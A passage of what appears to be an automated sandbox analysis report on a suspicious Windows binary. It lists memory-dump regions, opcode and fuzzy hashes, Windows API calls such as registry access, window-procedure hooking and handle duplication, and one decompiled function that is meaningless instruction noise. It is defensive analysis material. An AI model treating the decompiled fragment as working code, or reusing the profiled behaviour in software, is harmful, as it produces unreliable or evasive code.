                                                                    • Instruction Fuzzy Hash: 8111DFB5D007598FCB10CF9AD444BDEFBF8AB88224F14852AD869A7610C379A549CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7d083a01b4c741a2cfc331d61fc65edbffe3cfa7746ec68b77382589d264e18
                                                                    • Instruction ID: 6d04981e37c305d916b30c420d99f43a12059a5ec982298796fbe0570f1216c0
                                                                    • Opcode Fuzzy Hash: e7d083a01b4c741a2cfc331d61fc65edbffe3cfa7746ec68b77382589d264e18
                                                                    • Instruction Fuzzy Hash: B212C2F1C917468BE318DF65E9881893BA1F744328FD04A28DA712FAD4D7B8116ECF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 099be60e1a843ede91d58101eafe4911ac1691dab230aed8a4440e6ca589afa3
                                                                    • Instruction ID: caab2e503398e1403b13b236256798300803636cad1fd17faec2135ff7889c35
                                                                    • Opcode Fuzzy Hash: 099be60e1a843ede91d58101eafe4911ac1691dab230aed8a4440e6ca589afa3
                                                                    • Instruction Fuzzy Hash: 57A16F32E00229CFCF15DFA5C88459EBBB2FF85304B15856BE955BB222DB31A945CF80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d58fc6764455bf5a59fe4d04f7e62178cf5d6cf5a89157e7c622b10e1d81f246
                                                                    • Instruction ID: 4eea5c9c74b98e5e69acff5b472f3feb76926bc57dde802a332c0133bd62b1c7
                                                                    • Opcode Fuzzy Hash: d58fc6764455bf5a59fe4d04f7e62178cf5d6cf5a89157e7c622b10e1d81f246
                                                                    • Instruction Fuzzy Hash: D2C137F1C917468BE318DF65E9881893BB1FB85328F904A28DA712F6D4D7B4106ECF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 39%
                                                                    			E00235FE1(intOrPtr* __eax, signed int __ebx, void* __ecx, void* __edx, signed int* __edi, intOrPtr* __esi) {
                                                                    				intOrPtr* _t6;
                                                                    				intOrPtr* _t7;
                                                                    				intOrPtr* _t8;
                                                                    				intOrPtr* _t9;
                                                                    				intOrPtr* _t10;
                                                                    				signed int _t21;
                                                                    				signed int _t22;
                                                                    
                                                                    				_push(es);
                                                                    				asm("adc esi, [eax]");
                                                                    				_t6 = __eax -  *__eax +  *((intOrPtr*)(__eax -  *__eax));
                                                                    				asm("sahf");
                                                                    				 *_t6 =  *_t6 + _t6;
                                                                    				 *__edi =  *__edi + _t6;
                                                                    				 *_t6 =  *_t6 + _t6;
                                                                    				asm("adc [ebx], ebp");
                                                                    				_t7 = _t6 +  *__esi;
                                                                    				_push(ss);
                                                                    				 *_t7 =  *_t7 + _t7;
                                                                    				_t8 = _t7 -  *((intOrPtr*)(__edi + _t7 + 0x1f));
                                                                    				asm("popad");
                                                                    				_t22 = _t21 |  *__ebx;
                                                                    				asm("invd");
                                                                    				_pop(ds);
                                                                    				_push(_t8);
                                                                    				asm("popad");
                                                                    				 *_t8 =  *_t8 + _t8;
                                                                    				 *__edi =  *__edi | __ebx;
                                                                    				_t9 = _t8 -  *((intOrPtr*)(_t22 + 0x1f));
                                                                    				asm("sbb cl, [ebx+ebp]");
                                                                    				asm("in al, dx");
                                                                    				asm("rcl byte [ecx], 1");
                                                                    				 *__esi =  *__esi + _t9;
                                                                    				_pop(ds);
                                                                    				asm("sbb [ebx+ebp], ecx");
                                                                    				asm("loope 0x9");
                                                                    				_pop(ds);
                                                                    				_t10 = _t9;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				asm("sldt word [eax]");
                                                                    				 *_t10 =  *_t10 + __ebx;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				 *((intOrPtr*)(__edx + 1)) =  *((intOrPtr*)(__edx + 1)) + _t10;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				_push(_t22 + 1);
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				 *__edi =  *__edi + __ebx;
                                                                    				asm("sbb ecx, [ebx+ebp]");
                                                                    				return _t10;
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.710470004.0000000000232000.00000002.00020000.sdmp, Offset: 00230000, based on PE: true
                                                                    • Associated: 00000000.00000002.710457877.0000000000230000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.710812445.00000000002E8000.00000002.00020000.sdmp
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c02a7241e37a88ec05c9579e16c2fcd7273cab1e3c744a340b00c3a8e0bbe57
                                                                    • Instruction ID: 77454a34d5f5a12fcd1fc4c19f9daaf90e08585f152384c63090f9f7e2a21c3c
                                                                    • Opcode Fuzzy Hash: 9c02a7241e37a88ec05c9579e16c2fcd7273cab1e3c744a340b00c3a8e0bbe57
                                                                    • Instruction Fuzzy Hash: 5D11086141E7C64FCB678F748DB94A07F70EE4321031E41CBC8C18F1A3C628691AD726
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D0 m
                                                                    • API String ID: 0-3084831905
                                                                    • Opcode ID: 6f730661008e35278b90aa4d8e63d9e701d68ddddb963ae166a93945fe4bee29
                                                                    • Instruction ID: 9474ddb8a813262948f3f4a6132da8fdf87ae77cf03c70df99aed84a3c6b1c0f
                                                                    • Opcode Fuzzy Hash: 6f730661008e35278b90aa4d8e63d9e701d68ddddb963ae166a93945fe4bee29
                                                                    • Instruction Fuzzy Hash: C4920531F002049FDB24DBB8C894BEEB7A2AF96314F158469E416DB391DA34DD82D791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,?,00000000), ref: 00C1871F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: 8^ m
                                                                    • API String ID: 1378638983-3565041071
                                                                    • Opcode ID: 641c85acf086852cc0ebbea8e5545ece945f25b976a3be67acbaab8ed7b6d4c2
                                                                    • Instruction ID: c88a23955f7bfde28c00da380a8f2606b7724eee8bea642e79b6064eb27af387
                                                                    • Opcode Fuzzy Hash: 641c85acf086852cc0ebbea8e5545ece945f25b976a3be67acbaab8ed7b6d4c2
                                                                    • Instruction Fuzzy Hash: CB62A330A04244CFDB24DBA8C494BADBBA2AF86304F148569E419EF396CF74DDC9DB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cb69d11194a3dcaf3597aee8ab347f1c8617b3ba719bb8ce14a9b05224fe74a
                                                                    • Instruction ID: 1f9a3b6116fa2f065aeb87e68f12b03e214830de925ee09ab981cbfd31f55972
                                                                    • Opcode Fuzzy Hash: 8cb69d11194a3dcaf3597aee8ab347f1c8617b3ba719bb8ce14a9b05224fe74a
                                                                    • Instruction Fuzzy Hash: 2B622B30E047198FDB54EF78C85479EB7F2AF89304F1186A9D949AB254EF70AA81CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C13211
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 3effa81e7af69e29eaa9d52ef99f83c17d11ab6592b5056b1f7221c3b532cdd0
                                                                    • Instruction ID: 65cff83295dfafaa915d90422ba3cda1258249e04e70431ddd026244b3c1cd2a
                                                                    • Opcode Fuzzy Hash: 3effa81e7af69e29eaa9d52ef99f83c17d11ab6592b5056b1f7221c3b532cdd0
                                                                    • Instruction Fuzzy Hash: 34E10430B002445FD718EBB4C868BAE76E7AFC6308F148928E51AAB7D4DF34DD469785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7685b06fa0111dc0054e268d74c638629a99edcf46838844ce77542f2a604b19
                                                                    • Instruction ID: 4e815f9cdec86a9a5234689ee226393c6b0af77de02ac9e30afba00f9a4a2464
                                                                    • Opcode Fuzzy Hash: 7685b06fa0111dc0054e268d74c638629a99edcf46838844ce77542f2a604b19
                                                                    • Instruction Fuzzy Hash: 36618030E00215EFDB14EFB4D858BEEB7B5AF89304F208928D516A7290DFB59D85DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01126BB0
                                                                    • GetCurrentThread.KERNEL32 ref: 01126BED
                                                                    • GetCurrentProcess.KERNEL32 ref: 01126C2A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01126C83
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 1b31ab0d2da3dc74dc7cfee4b025b5ad9b34f45033c96286d81e86ccb737bf04
                                                                    • Instruction ID: 53d5e0f1fce37df32af56622b9c618216337e8d17fffd733f5b5780ce7a1a0d6
                                                                    • Opcode Fuzzy Hash: 1b31ab0d2da3dc74dc7cfee4b025b5ad9b34f45033c96286d81e86ccb737bf04
                                                                    • Instruction Fuzzy Hash: ED5144B0E003598FDB14CFA9D648BEEBBF0EB48314F208499E409B7390D7756984CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xc m$Xc m
                                                                    • API String ID: 0-3705575223
                                                                    • Opcode ID: 6cf2c076377a316d2023582d060205acfede6b8ccc333fae0b9b1cce73063b1b
                                                                    • Instruction ID: 6c508cae9a2cc583330601944d9d8fdad406deb45e23ad65f0306b8608004f83
                                                                    • Opcode Fuzzy Hash: 6cf2c076377a316d2023582d060205acfede6b8ccc333fae0b9b1cce73063b1b
                                                                    • Instruction Fuzzy Hash: 1C91D2307001189FCB18EBA4C855BEE7BA7AF8A305F148428F519DB295DF71DD82DB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3fcf9afb1872e2d939744eff64aad36fb39cccbb787036c2c188a2bf8035f46
                                                                    • Instruction ID: 21db7ee65d29801455b58cb7b19623eab71f457e9125686d9b91fc741d891d5b
                                                                    • Opcode Fuzzy Hash: a3fcf9afb1872e2d939744eff64aad36fb39cccbb787036c2c188a2bf8035f46
                                                                    • Instruction Fuzzy Hash: CC72CB34B04205CFDB14DBB8D494BADBBE2AF86304F148569E419DB392EB34DD86DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161C0
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 9388afbffc4f5e6bfd1bdb0bd4cc99cfa0f25a48a3883dcf834486e8c5a0ce0f
                                                                    • Instruction ID: 5a8a30d0aca94a28717c7f4c28f8f9e52166ae054996e73da4877cade197baa1
                                                                    • Opcode Fuzzy Hash: 9388afbffc4f5e6bfd1bdb0bd4cc99cfa0f25a48a3883dcf834486e8c5a0ce0f
                                                                    • Instruction Fuzzy Hash: ACA1D034F042058FDB10DBB8C8507EEB7B2EB8A304F258866D519EB386DB35DD869751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D20
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C17D5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 45d150187dbbc3adebfb5b36ebe144309fe95c901b79de584675c10086f93305
                                                                    • Instruction ID: a5586006089f7c3a0c186bd1fe81a0be559c03eda3a9c6f6805e9185f2385453
                                                                    • Opcode Fuzzy Hash: 45d150187dbbc3adebfb5b36ebe144309fe95c901b79de584675c10086f93305
                                                                    • Instruction Fuzzy Hash: 7331E534B083458FCB41EBB8C864AEE7BF1AF8A304B1581AAD508DB396EB34DD05C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C12178
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C121B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 9f4e499a42df321f44435112156396e93ab98897290580909a73c9135d030b98
                                                                    • Instruction ID: 9ec9671c3713032184b325091eb50d78fb6543b56afc10626edb1a317e1867d4
                                                                    • Opcode Fuzzy Hash: 9f4e499a42df321f44435112156396e93ab98897290580909a73c9135d030b98
                                                                    • Instruction Fuzzy Hash: 1021A038B042558FCB41EB78D804AAE7BF5EFCA300B558065E508E7391EB34ED459B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058BF8
                                                                    • BasepGetExeArchType.KERNEL32 ref: 01058C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 39ab4db635ad2aaa9fbc13fce596da450388a7ce44c0a867333869d9e1a57007
                                                                    • Instruction ID: 1fbdc471ed1a33379bcf8c5463a27753fd269d719438e2ae70dc6cddcbeff63a
                                                                    • Opcode Fuzzy Hash: 39ab4db635ad2aaa9fbc13fce596da450388a7ce44c0a867333869d9e1a57007
                                                                    • Instruction Fuzzy Hash: 3421B538F042148FCB84EB78C945AAE77F1EF89314B44C46AD909E7356EB34DD068790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15AD0
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C15B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 07d5228f82a4fb40de85e8a65fe69cf5b1ee57ea4b9e41a3b77227056418071c
                                                                    • Instruction ID: 02d574a73187cc17e866d41b3dd7496ff9fb87f244a51e5a82b740c3bbfabbbb
                                                                    • Opcode Fuzzy Hash: 07d5228f82a4fb40de85e8a65fe69cf5b1ee57ea4b9e41a3b77227056418071c
                                                                    • Instruction Fuzzy Hash: 3311A138F002148F8B80EBBCD845AAEBBF1FFC92117508529E509E7344EF30AD419B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a2e9820e15bc3ddde90c84b1f7c14afe0cacfec6f8e26380ed1a7e1a62d98f20
                                                                    • Instruction ID: 73b599fae8d85a989e45de70c5503558ae92278786183b481976caaff245c882
                                                                    • Opcode Fuzzy Hash: a2e9820e15bc3ddde90c84b1f7c14afe0cacfec6f8e26380ed1a7e1a62d98f20
                                                                    • Instruction Fuzzy Hash: 7D51D530B042059FCB44EBB4C854BAEB7F5EFC5304F14CA6AE9069B296EF70D9458791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a011f4f9ff3a7ce8594bc5a3caecbcfa8c9fa6bd494f3b5cbd0c35cf3afc21d
                                                                    • Instruction ID: c7b2331afefffc9816bb5693c985c9ba348eeb6e92e92ec753e9bfacce8b8c64
                                                                    • Opcode Fuzzy Hash: 6a011f4f9ff3a7ce8594bc5a3caecbcfa8c9fa6bd494f3b5cbd0c35cf3afc21d
                                                                    • Instruction Fuzzy Hash: BA415472E003598FCB00CFA9D4546EFFBF5EF85210F0885AAD945A7241EB789981CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,00C1287B,00000100,00000000,?), ref: 00C12DF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: 42b5ccaeb8654657b7a0074b4d7da00ab29bf00fc988b1974685680af1b4af93
                                                                    • Instruction ID: bd7bf35bc7a4bf1d243c51a4999aab0bdff26fc55c637f524e89c1c4ada44af7
                                                                    • Opcode Fuzzy Hash: 42b5ccaeb8654657b7a0074b4d7da00ab29bf00fc988b1974685680af1b4af93
                                                                    • Instruction Fuzzy Hash: 304164B5E04249CFCB10CFA9D884ADEBBF5BF49300F19806AE818AB341C7349945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011252A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 59b7a664ed0e96e78a0b755a2e742049413ee874b1c483084f33d9b5d8c726b1
                                                                    • Instruction ID: b425b04944024c4033b09d047c1b76deefdc839cdaed149f7bd63f1dcd21471e
                                                                    • Opcode Fuzzy Hash: 59b7a664ed0e96e78a0b755a2e742049413ee874b1c483084f33d9b5d8c726b1
                                                                    • Instruction Fuzzy Hash: 6C41B0B1D10319DFDF14CF99C984ADEBBB6BF48314F64812AE819AB250D774A885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 00C12B34
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: d602d6652027d6a0816774efbf6b2cba531066f4812c2169ed9144d4e79df4fc
                                                                    • Instruction ID: 86bca7f510469121c0a9848d483b375938b8b4377ba758ae9ca9e03bee0d4952
                                                                    • Opcode Fuzzy Hash: d602d6652027d6a0816774efbf6b2cba531066f4812c2169ed9144d4e79df4fc
                                                                    • Instruction Fuzzy Hash: 374176B4E04349CFCB10CF99C584ADEBBF5BF49304F28816AD809AB342D7749985CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 01127D01
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 75738ec282332e75f30edb0d63a945cf87026628ccaa1d4d9ab7b8f1374180ef
                                                                    • Instruction ID: 3e7a11ef27627287097b973fcd10af3b76f8f7305a923c5abf770037b662fcf8
                                                                    • Opcode Fuzzy Hash: 75738ec282332e75f30edb0d63a945cf87026628ccaa1d4d9ab7b8f1374180ef
                                                                    • Instruction Fuzzy Hash: C5413AB5A002198FDB18CF99C588AABBBF5FF88314F24C459D519AB361D734E851CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,00C1287B,00000100,00000000,?), ref: 00C12DF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: eccc7faa7eddee94dbd1c3996b8b4bf54e297a42e71028a8bbb9ecbf6458f183
                                                                    • Instruction ID: a4bfb4bf1afc68577db393a0a17e6dcf2e8faeffaa686107b383ef5b2f2462a5
                                                                    • Opcode Fuzzy Hash: eccc7faa7eddee94dbd1c3996b8b4bf54e297a42e71028a8bbb9ecbf6458f183
                                                                    • Instruction Fuzzy Hash: 5B31E2B5D002589FCB20CF9AD884ADEBBF5BF49310F55802AE819AB310D7749945DF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 00C12B34
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: 814174c3e7da08df979409554f0ccd2964ae6015c93f4edd5e7b9e5adef4ce2d
                                                                    • Instruction ID: 9cc97b56130330b783c10f2d49c14d981022a50fbf5eac6cb415dabca009c4a9
                                                                    • Opcode Fuzzy Hash: 814174c3e7da08df979409554f0ccd2964ae6015c93f4edd5e7b9e5adef4ce2d
                                                                    • Instruction Fuzzy Hash: DD3110B4D042498FCB10CF99C184ACEFBF5BF49304F68816AE80AAB341C7759985DFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9c909c87a040ffa7a768ce076f7959552e05a0cd21f26475dd1b5fe83fb6ba4b
                                                                    • Instruction ID: f1763a4704e63b14cb30c7641f999271af608862db77a336a3cf35a2e8065450
                                                                    • Opcode Fuzzy Hash: 9c909c87a040ffa7a768ce076f7959552e05a0cd21f26475dd1b5fe83fb6ba4b
                                                                    • Instruction Fuzzy Hash: 1421AE70905384DFDB01CFB8D4587DDBBB1FF4A314F2684A9D000AB2A6CB769885CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01126DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: fb427b89bb555a1923de205fa13b059b0312f47df660d098137b178f6a596d78
                                                                    • Instruction ID: a266246827c0ef59b5771334e2e8aa997a8dc558a3d3b75d2942779cd550dbe8
                                                                    • Opcode Fuzzy Hash: fb427b89bb555a1923de205fa13b059b0312f47df660d098137b178f6a596d78
                                                                    • Instruction Fuzzy Hash: 0C21F3B5D002189FDB10CFAAD984ADEBBF8FB48324F14841AE914B7350D378A954DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0105EABA), ref: 0105EBA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936767861.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: false
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 8b55b4dac2c2079bc352dd5c229bf2da33862592c2fae52a418e887dc042f30d
                                                                    • Instruction ID: a72e7eef80b8dfa4e155cd8cd04bb0d321dd6f24ccd2555c820633195bb22ac4
                                                                    • Opcode Fuzzy Hash: 8b55b4dac2c2079bc352dd5c229bf2da33862592c2fae52a418e887dc042f30d
                                                                    • Instruction Fuzzy Hash: BA1142B1C006199BCB10CF9AD444BEEFBF8EB48224F14856AD858B7240D378AA45CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0112C442
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936817123.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: ea5a8149072be07c6d371a45d3cc1e4a94a6ab6ac9ec2071ba0f8a4faa7b2aa6
                                                                    • Instruction ID: 7abd33a79e3416ad796f0839bd779042dc16173e2dae3883cc3450b9acc59a67
                                                                    • Opcode Fuzzy Hash: ea5a8149072be07c6d371a45d3cc1e4a94a6ab6ac9ec2071ba0f8a4faa7b2aa6
                                                                    • Instruction Fuzzy Hash: 5711ACB19003548FCB10DFA9D9087DFBFF4EB48314F24882AC905A7600DB79A545CFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C161FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
                                                                    • API String ID: 838778181-0
                                                                    • Opcode ID: 5c3cb2dba1235249c405f95ea186e45788b48a8d14460840d051f30645faeceb
                                                                    • Instruction ID: 413ce62206825d7a170c9a17c0e353dde00c96d26a5bebc7b69d9db01a9a226c
                                                                    • Opcode Fuzzy Hash: 5c3cb2dba1235249c405f95ea186e45788b48a8d14460840d051f30645faeceb
                                                                    • Instruction Fuzzy Hash: 7FE0C939F101298F8F44EBADD8559EC77E1EBC8229B408065D909E7254EF349C519751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BasepGetExeArchType.KERNEL32 ref: 00C121B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.936089312.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ArchBasepType
                                                                    • String ID:
